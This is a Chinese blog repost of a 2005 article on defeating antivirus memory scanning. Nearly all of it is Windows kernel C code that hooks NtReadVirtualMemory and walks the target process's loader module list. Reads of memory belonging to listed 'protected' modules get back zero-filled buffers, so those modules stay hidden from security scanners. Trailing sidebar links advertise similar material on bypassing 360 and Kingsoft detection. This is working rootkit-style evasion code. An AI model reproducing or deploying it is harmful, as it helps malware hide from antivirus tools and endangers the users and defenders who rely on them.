对抗杀毒软件的内存扫描

最新推荐文章于 2024-11-11 12:43:51 发布
最新推荐文章于 2024-11-11 12:43:51 发布
阅读量2k 收藏 1
点赞数
分类专栏: 病毒汇编和调试逆向技术加脱壳 windows底层核心編程 文章标签: 杀毒软件 table buffer list exception string
Author:  Polymorphours
Email:   Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:    2005-11-17

 
/*++
        Author: Polymorphours
	
	Date: 2005/1/10

	通过对 NtReadVirtualMemory 挂钩,防止其他进程对保护的模块进行扫描,
	如果发现其他进程读被保护模块的内存,则返回0

--*/


typedef struct _LDR_DATA_TABLE_ENTRY {
	
	LIST_ENTRY InLoadOrderLinks;
	LIST_ENTRY InMemoryOrderLinks;
	LIST_ENTRY InInitializationOrderLinks;
	PVOID DllBase;
	PVOID EntryPoint;
	ULONG SizeOfImage;
	UNICODE_STRING FullDllName;
	UNICODE_STRING BaseDllName;
	
	
	/*
	+0x034 Flags            : Uint4B
	+0x038 LoadCount        : Uint2B
	+0x03a TlsIndex         : Uint2B
	+0x03c HashLinks        : _LIST_ENTRY
	+0x03c SectionPointer   : Ptr32 Void
	+0x040 CheckSum         : Uint4B
	+0x044 TimeDateStamp    : Uint4B
	+0x044 LoadedImports    : Ptr32 Void
	+0x048 EntryPointActivationContext : Ptr32 Void
	+0x04c PatchInformation : Ptr32 Void	
	*/
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

/*++

	函数名: MyNtReadVirtualMemory
	
	参数:
		IN	HANDLE	ProcessHandle,
		IN	PVOID	BaseAddress,
		OUT	PVOID	Buffer,
		IN	ULONG	BufferLength,
		OUT	PULONG	ReturnLength	OPTIONAL
		
	功能:
		隐藏保护模块的内存,如果发现有内存扫描到这块内存,则返回加密后的数据扰乱扫描过程
		
	返回:
		NTSTATUS
		
--*/


NTSTATUS
MyNtReadVirtualMemory(
	IN	HANDLE	ProcessHandle,
	IN	PVOID	BaseAddress,
	OUT	PVOID	Buffer,
	IN	ULONG	BufferLength,
	OUT	PULONG	ReturnLength	OPTIONAL
	)
{
	NTSTATUS	status;
	PEPROCESS	eProcess;
	PVOID		Peb;
	
	PPEB_LDR_DATA	PebLdrData;
	PLDR_DATA_TABLE_ENTRY	LdrDataTableHeadList;
	PLDR_DATA_TABLE_ENTRY	LdrDataTableEntry;
	
	PLIST_ENTRY			Blink;
	PPROTECT_NODE		FileNode = NULL;
	BOOLEAN				bHideFlag = FALSE;
	ULONG				ImageMaxAddress = 0;

/*
#ifdef _DEBUG
	DbgPrint( "Call Process: %s, BaseAddress: %08x/n", PsGetProcessImageFileName( PsGetCurrentProcess() ), BaseAddress );
#endif
*/

	status =ObReferenceObjectByHandle(
				ProcessHandle,
				FILE_READ_DATA,
				PsProcessType,
				KernelMode,
				(PVOID)&eProcess,
				NULL
				);
	if ( NT_SUCCESS(status) ) {
		
		//
		// 得到PEB的地址
		//
		
		Peb = (PVOID)(*(PULONG)((PCHAR)eProcess + PebOffset));
		
		//
		// 切换到目标进程空间
		//
		
		
		KeAttachProcess( eProcess );
		
		//
		// 判断PEB是否有效,如果有效,那么准备利用PEB结构遍历进程加载的模块
		//

		if ( !MmIsAddressValid( Peb ) ) {

/*
#ifdef _DEBUG
			DbgPrint( "PEB is error./n" );
#endif
*/
			
			KeDetachProcess();
			ObDereferenceObject( eProcess );
			
			goto CLEANUP;
		}
		
		PebLdrData = (PPEB_LDR_DATA)(*(PULONG)( (PCHAR)Peb + 0xc ));
		
		if ( !PebLdrData ) {
			
			KeDetachProcess();
			ObDereferenceObject( eProcess );
			
			goto CLEANUP;
		}
		
		try {
			
			ProbeForRead ( 
				PebLdrData,
				sizeof(PEB_LDR_DATA),
				sizeof(ULONG)
				);
				
			//
			// 遍历模块链表
			//
			
			LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY)PebLdrData->InLoadOrderModuleList.Flink;
			LdrDataTableEntry = LdrDataTableHeadList;
			
			
			do {
				
				ProbeForRead(
					LdrDataTableEntry,
					sizeof(LDR_DATA_TABLE_ENTRY),
					sizeof(ULONG)
					);
					
				if ( !LdrDataTableEntry->DllBase ) {

					LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
					continue;	
				}

				
				//
				// 判断读的内存属于那一个模块,如果都不属于,那么放过
				//

				ImageMaxAddress = (ULONG)((ULONG)LdrDataTableEntry->DllBase + LdrDataTableEntry->SizeOfImage);
				
				if ( (ULONG)( (ULONG)BaseAddress + BufferLength) < (ULONG)LdrDataTableEntry->DllBase ||
					 (ULONG)BaseAddress > ImageMaxAddress ) {

					 //
					 // 如果不是读模块区域,那么枚举下一个
					 //	

					LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
					continue;	
				}
				
				//
				// 如果是被保护的模块,那么返回虚假数据
				//

				bHideFlag = FALSE;
				Blink = ProtectFile.Blink;
				

				while ( Blink != &ProtectFile ) {

					FileNode = CONTAINING_RECORD( Blink, PROTECT_NODE, ActiveLink );
					
					//
					// 如果发现当前文件存在于隐藏列表,那么设置隐藏标志隐藏它
					//

					if ( wcsstr( FileNode->ProtectName, LdrDataTableEntry->FullDllName.Buffer ) ) {

						bHideFlag = TRUE;
						break;
					}

					Blink = Blink->Blink;
				}
				
				if ( bHideFlag ) {
					
					//
					// 返回原本的进程空间进行处理
					//

					KeDetachProcess();
					ObDereferenceObject( eProcess );

					ProbeForWrite(
						Buffer,
						BufferLength,
						sizeof(ULONG)
						);
						
					memset( Buffer, 0x00, BufferLength );
					
					ProbeForWrite(
						ReturnLength,
						sizeof(PULONG),
						sizeof(ULONG)
						);
					
					*ReturnLength = BufferLength;
					
					return STATUS_SUCCESS;
				}
			
				LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
				
			} while ( LdrDataTableEntry != LdrDataTableHeadList );
			

		} except( EXCEPTION_EXECUTE_HANDLER ) {

			if ( !bHideFlag ) {
				
				KeDetachProcess();
				ObDereferenceObject( eProcess );
			}

			goto CLEANUP;
		}


		KeDetachProcess();
		ObDereferenceObject( eProcess );
	}
	
CLEANUP:

	return NtReadVirtualMemory(
			ProcessHandle,
			BaseAddress,
			Buffer,
			BufferLength,
			ReturnLength
			);
}
跳过安全软件的拦截:绕过360和金山毒霸的检测
zhouKouUU的博客
09-21 637
因此,在开发和测试过程中,我们应该遵守相关法律和规定,并寻找更合适的解决方案来确保软件的安全性和合规性。在开发软件的过程中,我们可能会遇到一些安全软件(如360安全卫士和金山毒霸)的拦截,这可能会对我们的开发和测试工作造成困扰。在本文中,我将介绍一些可以绕过这些安全软件检测的方法,并提供相应的C/C++代码示例。因此,我们建议与用户进行透明沟通,并寻求他们的明确授权和同意,以避免任何法律和道德问题。请注意,绕过安全软件的检测是一项复杂的任务,并且可能违反软件的使用条款。希望以上信息对您有所帮助!
对抗杀毒软件内存扫描源代码NT内核进程调度分析笔记.rar
04-27
本文档“对抗杀毒软件内存扫描源代码NT内核进程调度分析笔记”深入探讨了如何利用Windows NT内核的特性来规避杀毒软件内存扫描。 首先,NT内核是Windows操作系统的核心,负责管理系统的硬件资源、进程和线程调度...
内存保护机制及绕过方法——利用未启用SafeSEH模块绕过SafeSEH
weixin_30629977的博客
05-07 190
利用加载模块之外的地址绕过safeSEH 前言:文章涉及的概念在之前的文章中都有过详细的讲解 ⑴. 原理分析: 当程序加载进内存中后,处理PE文件(exe,dll),还有一些映射文件,safeSEH是不会对这些映射文件做安全检查。所以如果在这些映射文件中找到一些跳板地址(意义见之前的绕过利用/GS机制),就可以达到控制EIP的目的,执行恶意代码。 如上图,可以看到在PE文件之前有很...
Windows平台内存防护与绕过技术的进化演变系列之(一)内存攻防发展概述
weixin_34218579的博客
03-08 326
Chuck · 2015/05/12 10:320x00 引言最初有总结下的想法始于近期看过的几篇关于CFG绕过以及EMET绕过的文章,这些文章里大概都有提到类似这样的句子“As with every known exploitation mitigation, there are ways to bypass it if certain conditions are met.”。无论攻与防的技术...
[免杀学习]杀毒软件扫描浅析(上)
qq_42585535的博客
07-22 354
1.获取当前进程的句柄,也就是我们写的cpp程序,自己获取自己的句柄2.进入ScanProcessMemory方法,执行内存属性扫描流程3.先做准备工作,获取当前系统的可用虚拟地址空间范围(GetSystemInfo(&sysinfo);4.通过MEMORY_BASIC_INFORMATION获取每一个连续的内存页面,并将其起始地址,结束地址,状态,类型打印到控制台5.把用户模式下可用的所有内存空间遍历完后,退出函数,返回主函数,关闭进程句柄。
小巧杀毒软件代码
08-26
杀毒软件基础原理】 杀毒软件是一种计算机安全软件,主要功能是检测、清除或隔离电脑中的病毒、间谍软件...然而,实际的杀毒软件开发需要考虑更多的安全性和性能问题,如多线程扫描内存安全以及对未知威胁的防御。
易语言杀毒软件源码
09-14
6. **更新机制**:为了对抗新出现的病毒,杀毒软件需要定期更新病毒库。源码可能包含自动更新的代码,如通过HTTP或FTP下载更新文件。 7. **日志记录**:杀毒软件通常会记录扫描和处理结果,便于用户查看和分析。...
菜鸟也会编杀毒软件
12-13
3. **内存扫描**:除了静态扫描硬盘上的文件,杀毒软件还需要能够扫描内存中的进程,因为某些病毒会驻留在内存中以逃避检测。 4. **网络防护**:考虑到病毒和恶意软件的网络传播,杀毒软件需要具备拦截和分析网络...
微点杀毒软件及技术介绍.pptx
最新发布
12-04
在产品介绍中,微点杀毒软件的主要功能包括常规的病毒扫描和清理,实时监控,以及对于潜在威胁的智能检测和修复。在病毒的威胁日益多样化的当下,微点杀毒软件凭借其独特的技术和多样的功能,为用户提供了一个全面的...
9种通用杀毒软件内存之对比
05-06
九种通用杀毒软件内存的对比,NOD32、趋势、比特梵得、金山、江民、赛门铁克、瑞星、卡巴斯基、麦咖啡,分别记录了静默状态和扫描状态下所占内存量(单位:M)。
内存扫描原理
10-31
内存扫描源代码,大家可以看看,不行的就提提意见!!!
XE内存扫描工具安装包
10-06
XE内存扫描工具安装包
免杀-绕过内存扫描
weixin_44747030的博客
11-16 1997
免杀-绕过内存扫描
扫描内存工具Scanmem及其使用指南
gitblog_01173的博客
11-11 347
扫描内存工具Scanmem及其使用指南 scanmem memory scanner for Linux 项目地址: https://gitcode.com/gh_mirrors/sc/scanmem ...
安卓逆向之双剑合璧实现内存扫描
任鸟飞2217777779的博客
09-19 4954
PC端的逆向调试工具有CE,OD,XDBG等等,那在移动端是否有工具可以调试安卓模拟器或者是手机呢?
使用scanmem进行内存扫描与调试指南
gitblog_00738的博客
08-25 448
使用scanmem进行内存扫描与调试指南 scanmemmemory scanner for Linux项目地址:https://gitcode.com/gh_mirrors/sc/scanmem 项目介绍 scanmem 是一款专为Linux设计的调试工具,旨在定位并修改运行中进程内的任意变量地址。它通过接受指定进程的PID以及变量在不同时间点的值,经过多次扫描进程的地址空间,找到变量的确切...
[DRAM Test]内存测试、内存检测、内存维修工具汇总
热门推荐
2401_86762368的博客
09-22 1万+
[DRAM Test]内存测试、内存检测、内存维修工具汇总
【探索内存的奥秘】- memscan:高效精准的用户态进程内存扫描工具
gitblog_00023的博客
06-21 1030
【探索内存的奥秘】- memscan:高效精准的用户态进程内存扫描工具 项目地址:https://gitcode.com/gh_mirrors/me/memscan 项目介绍 在纷繁复杂的软件开发与逆向工程领域,精确而高效的内存操作犹如探照灯,照亮了程序内部运行的秘密路径。memscan 正是为此而生,一款专为64位Windows系统设计的命令行工具,旨在简化并加速对用户模式下进程内存扫描过程。...
Visual C++打造的中文界面杀毒软件深度解析
利用C++编写杀毒软件能够充分利用其高性能和内存管理的灵活性,以确保能够高效、准确地查杀病毒。 知识点二:Visual C++开发环境 Visual C++是微软公司推出的一款集成开发环境(IDE),它提供了编写、调试和发布C++...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值